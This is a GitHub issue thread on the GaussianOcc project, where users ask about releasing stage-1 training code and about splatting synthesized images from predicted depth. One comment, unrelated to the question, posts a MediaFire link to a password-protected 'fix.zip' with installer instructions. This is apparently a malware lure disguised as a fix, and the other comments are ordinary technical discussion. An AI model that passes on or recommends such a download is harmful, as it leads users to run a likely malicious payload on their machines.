### ISSUE TITLE
Training code for stage1

### ISSUE THREAD

**Issue by Gynjn** [GANWANSHUI/GaussianOcc#10]
First, Thanks for sharing your great work.

BTW, are you going to release the training code of stage 1?

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GANWANSHUI** [comment]
I am a bit busy recently, and the stage 1 model is trained on simpleocc repo, it would take some time for me to refine the code. it would be released but may not that fast.

**Comment by Gynjn** [comment]
Thanks for the reply.

**Comment by Marsjunwang** [comment]
Thank you for your great work on this project! 
I am currently trying to understand how to splat the synthesized images generated by the model.Could you please provide some guidance or example code/configuration for the following:
Splatting Process: How to effectively splat the synthesized images onto a 2D plane?
Configuration Settings: What specific parameters or configurations should I consider for optimal results?
Example Code: If possible, could you share a code snippet that demonstrates the splatting process?
Thank you!

**Comment by Gynjn** [comment]
@Marsjunwang If you get depth from the model, you can unproject the points in world space (assume it is reference identity pose). Then the points in the world space can be rasterized using splatting. (using reference pose or infered relative pose)

**Comment by Marsjunwang** [comment]
> @Marsjunwang If you get depth from the model, you can unproject the points in world space (assume it is reference identity pose). Then the points in the world space can be rasterized using splatting. (using reference pose or infered relative pose)

Thank you,@Gynjn,for your insightful response! I appreciate your explanation about unprojecting depth points in world space and the process of rasterization using splatting.  I am currently working on reproducing results with the collected data, and your input is extremely valuable. Thank you again!

**Comment by GANWANSHUI** [comment]
You may refer this [work](https://github.com/aipixel/GPS-Gaussian) for your implementation.

**Comment by Marsjunwang** [comment]
> You may refer this [work](https://github.com/aipixel/GPS-Gaussian) for your implementation.
Thank you for your suggestion!I will refer to this work for my implementation.
